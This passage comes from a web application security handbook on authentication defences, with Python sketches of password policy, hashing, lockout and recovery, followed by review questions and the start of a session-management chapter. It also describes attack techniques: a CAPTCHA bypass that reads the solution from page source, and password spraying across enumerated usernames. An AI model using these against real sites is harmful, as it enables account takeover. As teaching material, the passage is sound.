example, long passwords should be allowed, and a wide range of char-

acters should be allowed.
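
The rules listed above could be enforced along the following lines. This is a minimal sketch rather than a recommended policy: the minimum length, the tiny list of common passwords, and the function names are all assumptions chosen for illustration. The generator uses Python's `secrets` module, which draws from a cryptographic random source.

```python
import secrets
import string

MIN_LENGTH = 10  # assumed threshold; choose a value that suits the application
COMMON_PASSWORDS = {"password", "letmein", "qwerty123"}  # tiny illustrative sample


def password_problems(password, username, previous_passwords=()):
    """Return a list of the quality rules that the password breaks."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append("too short")
    if not any(c.islower() for c in password):
        problems.append("no lowercase letter")
    if not any(c.isupper() for c in password):
        problems.append("no uppercase letter")
    if not any(c.isdigit() for c in password):
        problems.append("no digit")
    if not any(c in string.punctuation for c in password):
        problems.append("no typographical character")
    if password.lower() in COMMON_PASSWORDS:
        problems.append("common password")
    if password.lower() == username.lower():
        problems.append("same as username")
    # Simplification: a real application would compare against stored
    # hashes of earlier passwords, not against clear-text copies.
    if password in previous_passwords:
        problems.append("previously used")
    return problems


def generate_password(length=16):
    """Create a system-generated password from a cryptographic random source."""
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))
```

Returning every broken rule at once, rather than stopping at the first, lets the application tell a user everything that needs fixing in a single response.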

Handle Credentials Secretively

■■

All credentials should be created, stored, and transmitted in a manner

that does not lead to unauthorized disclosure.

■■

All client-server communications should be protected using a well-

established cryptographic technology, such as SSL. Custom solutions

for protecting data in transit are neither necessary nor desirable.

■■

If it is considered preferable to use HTTP for the unauthenticated areas

of the application, ensure that the login form itself is loaded using

HTTPS, rather than switching to HTTPS at the point of the login

submission.

■■

Only POST requests should be used for transmitting credentials to the

server. Credentials should never be placed in URL parameters or cook-

ies (even ephemeral ones). Credentials should never be transmitted

back to the client, even in parameters to a redirect.

■■

All server-side application components should store credentials in a

manner that does not allow their original values to be easily recovered

even by an attacker who gains full access to all the relevant data within

the application’s database. The usual means of achieving this objective

is to use a strong hash function (such as SHA-256, at the time of this

writing), appropriately salted to reduce the effectiveness of precom-

puted offline attacks.

■■

Client-side “remember me” functionality should in general only

remember nonsecret items such as usernames. In less security-critical

applications, it may be considered appropriate to allow users to opt

in to a facility to remember passwords. In this situation, no clear-text

credentials should be stored on the client (the password should be

stored reversibly encrypted using a key known only to the server), and

users should be warned about the risks from an attacker with physical

access to their computer or who compromises their computer remotely.

Particular attention should be paid to eliminating cross-site scripting

vulnerabilities within the application that may be used to steal stored

credentials (see Chapter 12).

■■

A password change facility should be implemented (see the “Prevent

Misuse of the Password Change Function” section), and users should

be obliged to change their password periodically.

■■

Where credentials for new accounts are distributed to users out-of-

band, these should be sent as securely as possible, be time-limited, and

require the user to change them on first login, and the user should be

told to destroy the communication after first use.

■■

Where applicable, consider capturing some of the user’s login informa-

tion (for example, single letters from a memorable word) using drop-

down menus rather than text fields. This will prevent any keyloggers

installed on the user’s computer from capturing all of the data they

submit. (Note, however, that a simple keylogger is only one means by

which an attacker can capture user input. If he or she has already com-

promised a user’s computer, then in principle an attacker can log every

type of event, including mouse movements, form submissions over

HTTPS, and screen captures.)
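
The salted storage recommended in the list above can be sketched as follows. Note the substitution: instead of a single salted SHA-256 hash, this example uses PBKDF2, an iterated construction built on SHA-256 and available in Python's standard `hashlib`. It is slower to compute and therefore also slows offline guessing. The iteration count and the record layout are assumptions, not values taken from the text.

```python
import hashlib
import hmac
import secrets


def hash_password(password, iterations=600_000):
    """Return (salt, iterations, digest) for storage in place of the password."""
    salt = secrets.token_bytes(16)  # fresh random salt for every password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return salt, iterations, digest


def verify_password(password, record):
    """Recompute the digest from the stored salt and compare in constant time."""
    salt, iterations, expected = record
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return hmac.compare_digest(candidate, expected)
```

Because each record carries its own salt, two users with the same password get different digests, and a precomputed table built for one salt is of no use against another.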

Validate Credentials Properly

■■

Passwords should be validated in full — that is, in a case-sensitive way,

without filtering or modifying any characters, and without truncating

the password.

■■

The application should be aggressive in defending itself against unex-

pected events occurring during login processing. For example, depend-

ing on the development language in use, the application should use

catch-all exception handlers around all API calls. These should explic-

itly delete all session and method-local data being used to control the

state of the login processing and should explicitly invalidate the current

session, thereby causing a forced logout by the server even if authenti-

cation is somehow bypassed.

■■

All authentication logic should be closely code-reviewed, both as

pseudo-code and as actual application source code, to identify logic

errors such as fail-open conditions.

■■

If functionality to support user impersonation is implemented, this

should be strictly controlled to ensure that it cannot be misused to

gain unauthorized access. Because of the criticality of the functionality,

it is often worthwhile to remove this functionality entirely from the

public-facing application, and implement it only for internal adminis-

trative users, whose use of impersonation should be tightly controlled

and audited.

■■

Multistage logins should be strictly controlled to prevent an attacker

from interfering with the transitions and relationships between the

stages:

■■

All data about progress through the stages and the results of previ-

ous validation tasks should be held in the server-side session object

and should never be transmitted to or read from the client.

■■

No items of information should be submitted more than once by the

user, and there should be no means for the user to modify data that

has already been collected and/or validated. Where an item of data

such as a username is used at multiple stages, this should be stored

in a session variable when first collected, and referenced from there

subsequently.

■■

The first task carried out at every stage should be to verify that all

prior stages have been correctly completed. If this is not the case, the

authentication attempt should immediately be marked as bad.

■■

To prevent information leakage about which stage of the login failed

(which would enable an attacker to target each stage in turn), the

application should always proceed through all stages of the login,

even if the user has failed to complete earlier stages correctly, and

even if the original username was invalid. After proceeding through

all of the stages, the application should present a generic “login

failed” message at the conclusion of the final stage, without provid-

ing any information about where the failure occurred.

■■

Where a login process includes a randomly varying question, ensure

that an attacker is not able to effectively choose his own question:

■■

Always employ a multistage process in which users identify them-

selves at an initial stage, and the randomly varying question is pre-

sented to them at a later stage.

■■

When a given user has been presented with a given varying ques-

tion, store that question within their persistent user profile, and

ensure that the same user is presented with the same question on

each attempted login until they successfully answer it.

■■

When a randomly varying challenge is presented to the user, store

the question that has been asked within a server-side session vari-

able, rather than a hidden field in an HTML form, and validate the

subsequent answer against that saved question.
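
The multistage and varying-question rules above can be sketched together. The following is an illustrative model, not a complete login implementation: `LoginSession` stands in for the framework's server-side session object, `PENDING_QUESTION` stands in for the persistent user profile, and all data and names are hypothetical.

```python
import secrets

# Hypothetical data. Clear-text values keep the sketch short; real storage
# should follow the credential-handling guidance given earlier.
USERS = {
    "alice": {
        "password": "pw-alice",
        "answers": {"first school": "hilltop", "place of birth": "leeds"},
    }
}
QUESTIONS = ["first school", "place of birth"]
PENDING_QUESTION = {}  # username -> question; stands in for the persistent profile


class LoginSession:
    """Server-side session object; none of these fields go to the client."""

    def __init__(self):
        self.username = None
        self.stage_one_done = False
        self.question = None
        self.failed = False


def stage_one(session, username, password):
    user = USERS.get(username)
    session.username = username  # collected once, then read only from the session
    session.failed = user is None or user["password"] != password
    # Reuse the outstanding question so that restarting the login cannot
    # be used to cycle through questions.
    if username not in PENDING_QUESTION:
        PENDING_QUESTION[username] = secrets.choice(QUESTIONS)
    session.question = PENDING_QUESTION[username]
    session.stage_one_done = True
    return session.question  # shown to the user regardless of the outcome so far


def stage_two(session, answer):
    if not session.stage_one_done:  # first task: verify the prior stage
        session.failed = True
    user = USERS.get(session.username)
    if user is None or user["answers"].get(session.question) != answer:
        session.failed = True
    if session.failed:
        return "login failed"  # generic message, no hint about which stage failed
    PENDING_QUESTION.pop(session.username, None)  # answered; pick afresh next time
    return "welcome"
```

The client only ever sees the question text and the final generic result. The username, the progress flag, and the question being answered are all read from the session, so resubmitting or altering them in a request has no effect.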

NOTE The subtleties of devising a secure authentication mechanism run

deep here. If care is not taken in the asking of a randomly varying question,

then this can lead to new opportunities for username enumeration. For

example, in order to prevent an attacker from choosing his own question, an

application may store within each user’s profile the last question that user was

asked, and continue presenting that question until the user answers it correctly.

An attacker who initiates several logins using any given user’s username will

be met with the same question. However, if the attacker carries out the same

process using an invalid username, the application may behave differently:

because there is no user profile associated with an invalid username, there

will be no stored question, and so a varying question will be presented. The

attacker can use this difference in behavior, manifested across several login

attempts, to infer the validity of a given username. In a scripted attack, he will

be able to harvest numerous usernames quickly.

If an application wishes to defend itself against this possibility, it must go to

some lengths. When a login attempt is initiated with an invalid username, the

application must record somewhere the random question that it presented for

that invalid username and ensure that subsequent login attempts using the

same username are met with the same question. Going even further, the

application could switch to a different question periodically, to simulate the

nonexistent user having logged in as normal, resulting in a change in their next

question! At some point, however, the application designer must draw a line

and concede that a total victory against an attacker as determined as this is

probably not achievable.
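
One possible way to get this behavior is sketched below. The text suggests recording the question shown for each invalid username; this example swaps in a different technique, deriving the question from a keyed hash of the username, so that the same invalid username always meets the same question without a record being stored for it. The key, the question list, and the `period` parameter are assumptions made for illustration.

```python
import hashlib
import hmac

QUESTIONS = ["first school", "place of birth", "mother's maiden name"]
SERVER_KEY = b"replace-with-a-random-secret"  # hypothetical; keep it on the server


def decoy_question(username, period=0):
    """Derive a stable question for a username that has no profile.

    Changing `period` (for example, a counter that advances every few
    days) switches the question, imitating a real user whose question
    changes after a successful login.
    """
    message = f"{period}:{username}".encode("utf-8")
    digest = hmac.new(SERVER_KEY, message, hashlib.sha256).digest()
    index = int.from_bytes(digest[:8], "big") % len(QUESTIONS)
    return QUESTIONS[index]
```

Without the server key, an attacker cannot predict which question a given invalid username will produce, and repeated attempts with that username see a consistent question, as they would for a real account.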

Prevent Information Leakage

■■

The various authentication mechanisms used by the application should

not disclose any information about authentication parameters, either

through overt messages or through inference from other aspects of the

application’s behavior. An attacker should have no means of determin-

ing which piece of the various items submitted has caused a problem.

■■

A single code component should be responsible for responding to all

failed login attempts, with a generic message. This avoids a subtle vul-

nerability that can occur when a supposedly uninformative message

returned from different code paths can actually be discriminated by an

attacker, due to typographical differences in the message, different

HTTP status codes, other information hidden in HTML, and the like.

■■

If the application enforces some kind of account lockout to prevent

brute-force attacks (as discussed in the next section), then care should

be taken that this does not lead to any information leakage. For exam-

ple, if an application discloses that a specific account has been sus-

pended for X minutes due to Y failed logins, then this behavior can

easily be used to enumerate valid usernames. In addition, disclosing

the precise metrics of the lockout policy enables an attacker to optimize

any attempt to continue guessing passwords in spite of the policy. To

avoid enumeration of usernames, the application should respond to any

series of failed login attempts from the same browser with a generic

message advising that accounts are suspended if multiple failures occur

and that the user should try again later. This can be achieved using a

cookie or hidden field to track repeated failures originating from the

same browser. (Of course, this mechanism should not be used to

enforce any actual security control — only to provide a helpful message

to ordinary users who are struggling to remember their credentials.)

■■

If the application supports self-registration, then it can prevent this func-

tion from being used to enumerate existing usernames in two ways:

■■

Instead of permitting self-selection of usernames, the application can

create a unique (and unpredictable) username for each new user,

thereby obviating the need to disclose that a username selected

already exists.

■■

The application can use email addresses as usernames. Here, the

first stage of the registration process requires the user to enter their

email address, whereupon they are told simply to wait for an email

and follow the instructions contained within it. If the email address

is already registered, the user can be informed of this in the email. If

the address is not already registered, the user can be provided with

a unique, unguessable URL to visit to continue the registration

process. This prevents the attacker from enumerating valid user-

names (unless they happen to have already compromised a large

number of email accounts).
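
The email-based registration flow described above might look like the following sketch. The in-memory `OUTBOX` stands in for a mail system, and the URL, message wording, and names are hypothetical. The point it illustrates is that the on-screen response is identical whether or not the address is already registered; only the email differs.

```python
import secrets

REGISTERED = {"alice@example.com"}  # hypothetical existing accounts
OUTBOX = []    # (recipient, body) pairs; stands in for a mail system
PENDING = {}   # registration token -> email address

GENERIC_RESPONSE = "Please check your email and follow the instructions in it."


def begin_registration(email):
    """First stage of registration: always give the same on-screen response."""
    if email in REGISTERED:
        OUTBOX.append((email, "This address is already registered."))
    else:
        token = secrets.token_urlsafe(32)  # unique and unguessable
        PENDING[token] = email
        OUTBOX.append(
            (email, f"Continue at https://app.example/register?token={token}")
        )
    return GENERIC_RESPONSE
```

Only someone who can read the mailbox learns whether the address was already registered, which is the property the text relies on.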

Prevent Brute-Force Attacks

■■

Measures need to be enforced within all of the various challenges

implemented by the authentication functionality in order to prevent

attacks that attempt to meet those challenges using automation. This

includes the login itself, as well as functions to change password, to

recover from a forgotten password situation, and the like.

■■

Using unpredictable usernames and preventing their enumeration pre-

sents a significant obstacle to completely blind brute-force attacks, and

requires an attacker to have somehow discovered one or more specific

usernames before mounting an attack.

■■

Some security-critical applications (such as online banks) simply

disable an account after a small number of failed logins (e.g., three)

and require that the account owner take various out-of-band steps to

reactivate the account, such as telephoning customer support and

answering a series of security questions. Disadvantages of this policy

are that it allows an attacker to deny service to legitimate users by

repeatedly disabling their accounts, and the cost of providing the

account recovery service. A more balanced policy, suitable for most

security-aware applications, is to suspend accounts for a short period

(e.g., 30 minutes) following a small number of failed login attempts

(e.g., three). This serves to massively slow down any password-

guessing attack, while mitigating the risk of denial-of-service attacks

and also reducing call center work.

■■

If a policy of temporary account suspension is implemented, care

should be taken to ensure its effectiveness:

■■

To prevent information leakage leading to username enumeration,

the application should never indicate that any specific account has

been suspended. Rather, it should respond to any series of failed

logins, even those using an invalid username, with a message advis-

ing that accounts are suspended if multiple failures occur and that

the user should try again later (as discussed previously).

■■

The metrics of the policy should not be disclosed to users. Telling

legitimate users simply to “try again later” does not seriously dimin-

ish their quality of service. But informing an attacker exactly how

many failed attempts are tolerated, and how long the suspension

period lasts, enables them to optimize any attempt to continue

guessing passwords in spite of the policy.

■■

If an account is suspended, then login attempts should be rejected

without even checking the credentials. Some applications that have

implemented a suspension policy remain vulnerable to brute forcing

because they continue to fully process login attempts during the sus-

pension period, and return a subtly (or not so subtly) different mes-

sage when valid credentials are submitted. This behavior enables an

effective brute-force attack to proceed at full speed regardless of the

suspension policy.

■■

Per-account countermeasures such as account lockout do not help to

protect against one kind of brute-force attack that is often highly effec-

tive — namely to iterate through a long list of enumerated usernames

checking a single weak password, such as "password". If, for example, five

failed attempts trigger an account suspension, this means an attacker

can attempt four different passwords on every account without causing

any disruption to users. In a typical application containing many weak

passwords, such an attacker is likely to compromise many accounts.

The effectiveness of this kind of attack will, of course, be massively

reduced if other areas of the authentication mechanism are designed

securely. If usernames cannot be enumerated or reliably predicted, an

attacker will be slowed down by the need to perform a brute-force exer-

cise in guessing usernames. And if strong requirements are in place for

password quality, it is far less likely that the attacker will choose a pass-

word for testing that even a single user of the application has chosen.

In addition to these controls, an application can specifically protect

itself against this kind of attack through the use of CAPTCHA (“Com-

pletely Automated Public Turing test to tell Computers and Humans

Apart”) challenges on every page that may be a target for brute-force

attacks (see Figure 6-8). If effective, this measure can prevent any automated

submission of data to any application page, thereby forcing all kinds of

password-guessing attacks to be executed manually.

Note that much research has been done into CAPTCHA technologies,

and automated attacks against them have in some cases been reliable.

Further, some attackers have been known to devise CAPTCHA-solving

competitions, in which unwitting members of the public are leveraged

as drones to assist the attacker. However, even if a particular kind of

challenge is not entirely effective, it will still lead most casual attackers

to desist and find an application that does not employ the technique.

Figure 6-8: A CAPTCHA control

designed to hinder automated attacks
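
The temporary suspension policy described in this section can be sketched as follows. This is a simplified model under stated assumptions: the thresholds reuse the example figures from the text, state is held in memory, and the class and function names are hypothetical. It rejects attempts on a suspended account before looking at the credentials, counts failures for invalid usernames too, and returns one generic message that discloses neither the policy metrics nor the state of any account.

```python
import time

MAX_FAILURES = 3              # assumed values, taken from the examples in the text
SUSPENSION_SECONDS = 30 * 60
GENERIC_FAILURE = ("Login failed. Accounts are suspended if multiple "
                   "failures occur; please try again later.")


class LockoutTracker:
    def __init__(self, clock=time.monotonic):
        self._clock = clock
        self._failures = {}          # username -> consecutive failures
        self._suspended_until = {}   # username -> time the suspension ends

    def is_suspended(self, username):
        return self._clock() < self._suspended_until.get(username, float("-inf"))

    def record_failure(self, username):
        count = self._failures.get(username, 0) + 1
        if count >= MAX_FAILURES:
            self._suspended_until[username] = self._clock() + SUSPENSION_SECONDS
            count = 0
        self._failures[username] = count

    def record_success(self, username):
        self._failures.pop(username, None)


def attempt_login(tracker, username, password, check_credentials):
    if tracker.is_suspended(username):
        return GENERIC_FAILURE  # rejected without checking the credentials
    if check_credentials(username, password):
        tracker.record_success(username)
        return "welcome"
    tracker.record_failure(username)  # counted even if the username is invalid
    return GENERIC_FAILURE
```

Passing the clock in as a parameter is a design choice that makes the policy testable without waiting for a real suspension period to pass.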

TIP If you are attacking an application that uses CAPTCHA controls to hinder

automation, always closely review the HTML source for the page in which the

image appears. The authors have encountered cases where the solution to the

puzzle appears in literal form within the ALT attribute of the image tag, or

within a hidden form field, enabling a scripted attack to defeat the protection

without actually solving the puzzle itself.
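
The review suggested in this tip can be partly automated. The sketch below uses Python's standard `html.parser` module to list the ALT text of images and the values of hidden form fields, which are the two places named above. The class and function names are hypothetical, and the output is only a list of candidates for manual review, not a verdict.

```python
from html.parser import HTMLParser


class CaptchaLeakFinder(HTMLParser):
    """Collect image ALT text and hidden field values from a page."""

    def __init__(self):
        super().__init__()
        self.candidates = []

    def handle_starttag(self, tag, attrs):
        attributes = dict(attrs)
        if tag == "img" and attributes.get("alt"):
            self.candidates.append(("img alt", attributes["alt"]))
        if tag == "input" and (attributes.get("type") or "").lower() == "hidden":
            label = f"hidden field {attributes.get('name')}"
            self.candidates.append((label, attributes.get("value")))


def find_candidates(page_html):
    """Return (location, value) pairs worth comparing with the puzzle image."""
    finder = CaptchaLeakFinder()
    finder.feed(page_html)
    return finder.candidates
```

If any candidate matches the text shown in the puzzle image, a scripted attack can read the solution straight from the page.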

Prevent Misuse of the Password Change Function

■■

A password change function should always be implemented, to allow

periodic password expiration (if required) and to allow users to change

passwords if they wish to for any reason. As a key security mechanism,

this needs to be very well defended against misuse.

■■

The function should only be accessible from within an authenticated

session.

■■

There should be no facility to provide a username, either explicitly or

via a hidden form field or cookie — users have no legitimate need to

attempt to change other people’s passwords.

■■

As a defense-in-depth measure, the function should be protected from

unauthorized access gained via some other security defect in the appli-

cation — such as a session hijacking vulnerability, cross-site scripting,

or even an unattended terminal. To this end, users should be required

to reenter their existing password.

■■

The new password should be entered twice to prevent mistakes, and

the application should compare the “new password” and “confirm new

password” fields as its first step and return an informative error if they

do not match.

■■

The function should prevent the various attacks that can be made

against the main login mechanism: a single generic error message

should be used to notify users of any error in existing credentials, and

the function should be temporarily suspended following a small num-

ber of failed attempts to change password.

■■

Users should be notified out-of-band (e.g., via email) that their pass-

word has been changed, but the message should not contain either their

old or new credentials.
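
Several of the rules above can be seen together in a short sketch. It is illustrative only: the function takes the authenticated username from the session rather than from the request, and `verify_password`, `set_password`, and `notify` are hypothetical callables supplied by the surrounding application. The suspension after repeated failures is left out to keep the example short.

```python
GENERIC_ERROR = "Password change failed."
MISMATCH_ERROR = "The new password and its confirmation do not match."


def change_password(session_user, existing, new, confirm,
                    verify_password, set_password, notify):
    """Change the password of the user who owns the current session.

    There is no username parameter: the account is always the one
    attached to the authenticated session.
    """
    if session_user is None:
        return GENERIC_ERROR  # only reachable from an authenticated session
    if new != confirm:
        return MISMATCH_ERROR  # checked first, with an informative error
    if not verify_password(session_user, existing):
        return GENERIC_ERROR  # same message for any problem with existing credentials
    set_password(session_user, new)
    # Out-of-band notice that contains neither the old nor the new password.
    notify(session_user, "Your password was changed.")
    return "ok"
```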

Prevent Misuse of the Account Recovery Function

■■

In the most security-critical applications, such as online banking,

account recovery in the event of a forgotten password is handled out-

of-band: a user must make a telephone call and answer a series of secu-

rity questions, and new credentials or a reactivation code are also sent

out-of-band (via conventional mail) to the user’s registered home

address. The majority of applications do not want or need this level of

security, and so an automated recovery function may be appropriate.

■■

A well-designed password recovery mechanism needs to prevent

accounts from being compromised by an unauthorized party, and mini-

mize any disruption to legitimate users.

■■

Features such as password “hints” should absolutely never be used,

since they mainly serve to assist an attacker in trawling for accounts

with obvious hints set.

■■

The best automated solution for enabling users to regain control of

accounts is to email the user a unique, time-limited, unguessable,

single-use recovery URL. This email should be sent to the address that

the user provided during registration. Visiting the URL will allow the

user to set a new password. After this has been done, a second email

should be sent, indicating that a password change was made. To pre-

vent an attacker denying service to users by continually requesting

password reactivation emails, the user’s existing credentials should

remain valid until such time as they are changed.

■■

To further protect against unauthorized access, applications may pre-

sent users with a secondary challenge that they must complete before

gaining access to the password reset function. Care must be taken to

ensure that the design of this challenge does not introduce new

vulnerabilities:

■■

The challenge should implement the same question or set of ques-

tions for everyone, mandated by the application during registration.

If users provide their own challenge, it is likely that some of these

will be very weak, and this also enables an attacker to enumerate

valid accounts by identifying those which have a challenge set.

■■

Responses to the challenge should contain sufficient entropy that

they cannot be easily guessed. For example, asking the user for the

name of their first school is preferable to asking for their favorite

color.

■■

Accounts should be temporarily suspended following a number of

failed attempts to complete the challenge, to prevent brute-force

attacks.

■■

The application should not leak any information in the event of

failed responses to the challenge — regarding the validity of the

username, any suspension of the account, and so on.

■■

Successful completion of the challenge should be followed by the

process described previously, in which a message is sent to the

user’s registered email address containing a reactivation URL.

Under no circumstances should the application disclose the user’s

forgotten password or simply drop the user into an authenticated

session. Even proceeding directly to the password reset function is

undesirable, because the response to the account recovery challenge

will in general be easier for an attacker to guess than the original

password, and so it should not be relied upon on its own to authen-

ticate the user.
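
The recovery URL recommended above can be sketched in a few lines. This is a minimal illustration rather than a complete implementation: the in-memory store, the 30-minute lifetime, and the function names are all assumptions made for the example, and a real application would persist the records and send the email itself.

```python
import hashlib
import secrets
import time

RECOVERY_TTL_SECONDS = 30 * 60  # assumed lifetime; tune to the application

# Hypothetical in-memory store: sha256(token) -> (username, expiry time).
_pending = {}


def issue_recovery_token(username, now=None):
    """Create an unguessable token to embed in the emailed recovery URL."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
    digest = hashlib.sha256(token.encode()).hexdigest()
    # Only the hash is stored, so a leaked store does not reveal usable URLs.
    _pending[digest] = (username, now + RECOVERY_TTL_SECONDS)
    return token


def redeem_recovery_token(token, now=None):
    """Return the username if the token is valid, else None. Single use."""
    now = time.time() if now is None else now
    digest = hashlib.sha256(token.encode()).hexdigest()
    entry = _pending.pop(digest, None)  # pop: a token can never be replayed
    if entry is None:
        return None
    username, expires_at = entry
    return username if now <= expires_at else None
```

Issuing a token does not touch the user's existing password, so repeated recovery requests by an attacker cannot lock the legitimate user out.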

Log, Monitor, and Notify

■■

All authentication-related events should be logged by the application,

including login, logout, password change, password reset, account sus-

pension, and account recovery. Where applicable, both failed and suc-

cessful attempts should be logged. The logs should contain all relevant

details (e.g., username and IP address) but no security secrets (e.g.,

passwords). Logs should be strongly protected from unauthorized

access, as they are a critical source of information leakage.

■■

Anomalies in authentication events should be processed by the applica-

tion’s real-time alerting and intrusion prevention functionality. For

example, application administrators should be made aware of patterns

indicating brute-force attacks, so that appropriate defensive and offen-

sive measures can be considered.

■■

Users should be notified out-of-band of any critical security events. For

example, the application should send a message to a user’s registered

email address whenever he changes his password.

■■

Users should be notified in-band of frequently occurring security

events. For example, after a successful login, the application should

inform users of the time and source IP/domain of the last login, and

the number of invalid login attempts made since then. If a user is

made aware that her account is being subjected to a password-

guessing attack, she is more likely to change her password

frequently and set it to a strong value.
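
As a rough sketch of the logging and in-band notification points above, the following records each login attempt without the submitted password and, on success, returns the details the user should be shown. The class and field names are hypothetical and the storage is in memory only.

```python
from dataclasses import dataclass, field


@dataclass
class LoginHistory:
    """Per-user record used to build the in-band notice (hypothetical)."""
    last_login: tuple = None   # (timestamp, source_ip) of the last success
    failures_since: int = 0    # failed attempts since that success


@dataclass
class AuthEventLog:
    events: list = field(default_factory=list)
    history: dict = field(default_factory=dict)

    def record_login(self, username, source_ip, timestamp, success):
        """Log the attempt; on success, return the notice to show the user."""
        # Note what is NOT logged: the submitted password.
        self.events.append((timestamp, "login", username, source_ip, success))
        record = self.history.setdefault(username, LoginHistory())
        if not success:
            record.failures_since += 1
            return None
        notice = {"last_login": record.last_login,
                  "failed_attempts": record.failures_since}
        record.last_login = (timestamp, source_ip)
        record.failures_since = 0
        return notice
```

The same event list could feed whatever alerting the application has; the threshold at which failures count as a brute-force pattern is left to the deployment.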

Chapter Summary

Authentication functions are perhaps the most prominent target in a typical

application’s attack surface. By definition, they can be reached by unprivi-

leged, anonymous users. If broken, they grant access to protected functional-

ity and sensitive data. They lie at the core of the security mechanisms that an

application employs to defend itself, and are the front line of defense against

unauthorized access.

Real-world authentication mechanisms contain a myriad of design and

implementation flaws. An effective assault against them needs to proceed sys-

tematically, using a structured methodology to work through every possible

avenue of attack. In many cases, open goals present themselves — bad pass-

words, ways to find out usernames, and vulnerability to brute-force attacks. At

the other end of the spectrum, defects may be very hard to uncover, and it may

require meticulous examination of a convoluted login process to establish the

assumptions being made and spot the subtle logic flaw that can be exploited to

walk right through the door.

The most important lesson when attacking authentication functionality is to

look everywhere. In addition to the main login form, there may be functions to

register new accounts, change passwords, recover forgotten passwords, and

impersonate other users. Each of these presents a rich

target of potential defects, and problems that have been consciously elimi-

nated within one function very often reemerge within others. Invest the time

to scrutinize and probe every inch of attack surface you can find, and your

rewards may be great.

Questions

Answers can be found at www.wiley.com/go/webhacker.

1. While testing a web application, you log in using your credentials of joe

and pass. During the login process, you see a request for the following

URL appear in your intercepting proxy:

http://www.wahh-app.com/app?action=login&uname=joe&password=pass

What three vulnerabilities can you diagnose without probing any

further?

2. How can self-registration functions introduce username enumeration

vulnerabilities? How can these vulnerabilities be prevented?

3. A login mechanism involves the following steps:

(a) The application requests the user’s username and passcode.

(b) The application requests two randomly chosen letters from the

user’s memorable word.

Why is the required information requested in two separate steps? What

defect would the mechanism contain if this were not the case?

4. A multistage login mechanism first requests the user’s username and

then various other items across successive stages. If any supplied item

is invalid, the user is immediately returned to the first stage.

What is wrong with this mechanism, and how can the vulnerability be

corrected?

5. An application incorporates an anti-phishing mechanism into its login

functionality. During registration, each user selects a specific image

from a large bank of memorable images presented to them by the appli-

cation. The login function involves the following steps:

(a) The user enters their username and date of birth.

(b) If these details are correct, the application displays to the user their

chosen image; otherwise, a random image is displayed.

(c) The user verifies whether the correct image is displayed and, if so, enters

their password.

The idea behind the anti-phishing mechanism is that it enables the user

to confirm that they are dealing with the authentic application, and not

a clone, because only the real application knows the correct image to

display to the user.

What vulnerability does the anti-phishing mechanism introduce into

the login function? Is the mechanism effective in preventing phishing?

CHAPTER 7

Attacking Session Management

The session management mechanism is a fundamental security component in

the majority of web applications. It is what enables the application to uniquely

identify a given user across a number of different requests, and to handle the

data that it accumulates about the state of that user’s interaction with the

application. Where an application implements login functionality, session

management is of particular importance, as it is what enables the application

to persist its assurance of any given user’s identity beyond the request in

which they supply their credentials.

Because of the key role played by session management mechanisms, they

are a prime target for malicious attacks against the application. If an attacker

can break an application’s session management, then she can effectively

bypass its authentication controls and masquerade as other application users

without knowing their credentials. If an attacker compromises an administra-

tive user in this way, then the attacker can own the entire application.

As with authentication mechanisms, there is a wide variety of defects that can

commonly be found in session management functions. In the most vulnerable

cases, an attacker simply needs to increment the value of a token issued to them

by the application in order to switch their context to that of a different user. In

this situation, the application is wide open for anyone to access all areas. At the

other end of the spectrum, an attacker may have to work extremely hard, deci-

phering several layers of obfuscation and devising a sophisticated automated

attack, before finding a chink in the application’s armor.

In this chapter, we will look at all of the types of weakness that the authors

have encountered in real-world web applications. We will set out in detail the

practical steps that you need to take to find and exploit these defects. Finally,

we will describe the defensive measures that applications should take to pro-

tect themselves against these attacks.

COMMON MYTH “We use smartcards for authentication, and users’

sessions cannot be compromised without the card.”

However robust an application’s authentication mechanism, subsequent

requests from users are only linked back to that authentication via the resulting

session. If the application’s session management is flawed, then an attacker

can bypass the robust authentication altogether and still compromise users.

The Need for State

The HTTP protocol is essentially stateless. It is based on a simple request-

response model, in which each pair of messages represents an independent

transaction. The protocol itself contains no mechanism for linking together the

series of requests made by one particular user and distinguishing these from

all of the other requests received by the web server. In the early days of the

Web, there was no need for any such mechanism: web sites were used to pub-

lish static HTML pages for anyone to view. Today, things are very different.

The majority of web “sites” are in fact web applications. They allow you to

register and log in. They remember your preferences next time you visit.

They deliver rich, multimedia experiences with

content created dynamically based on what you click and type. In order to

implement any of this functionality, web applications need to use the concept

of a session.

The most obvious use of sessions is in applications that support logging in.

After entering your username and password, you can go ahead and use the

application as the user whose credentials you have entered, until such time as

you log out or the session expires due to inactivity. Users do not want to have

to reenter their password on every single page of the application. Hence, after

authenticating the user once, the application creates a session for them, and

treats all requests belonging to that session as coming from that user.

Applications that do not have a login function also typically need to use ses-

sions. Many sites selling merchandise do not require customers to create

accounts. However, they allow users to browse the catalog, add items to a

shopping basket, provide delivery details, and make payment. In this sce-

nario, there is no need to authenticate the identity of the user: for the majority

of their visit, the application does not know or care who the user is. But, in

order to do business with them, it needs to know which series of requests it

receives has originated from the same user.

The simplest and still most common means of implementing sessions is to

issue each user with a unique session token or identifier. On each subsequent

request to the application, the user resubmits this token, enabling the application

to determine which sequence of earlier requests the current request relates to.

In most cases, applications use HTTP cookies as the transmission mecha-

nism for passing these session tokens between server and client. The server’s

first response to a new client contains an HTTP header like the following:

Set-Cookie: ASP.NET_SessionId=mza2ji454s04cwbgwb2ttj55

and subsequent requests from the client contain the header:

Cookie: ASP.NET_SessionId=mza2ji454s04cwbgwb2ttj55
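
The token exchange shown in these two headers can be sketched as follows. This is only an illustration of the idea, not how any particular platform implements it: the cookie name `SessionId`, the in-memory dictionary, and both function names are assumptions.

```python
import secrets
from http.cookies import SimpleCookie

COOKIE_NAME = "SessionId"  # hypothetical cookie name
_sessions = {}             # token -> per-session state, held server-side


def start_session():
    """Create a session and return the Set-Cookie header value to send."""
    token = secrets.token_urlsafe(24)
    _sessions[token] = {}
    return f"{COOKIE_NAME}={token}"


def lookup_session(cookie_header):
    """Map the Cookie header of a later request back to its session state."""
    cookie = SimpleCookie()
    cookie.load(cookie_header)
    morsel = cookie.get(COOKIE_NAME)
    if morsel is None:
        return None
    return _sessions.get(morsel.value)
```

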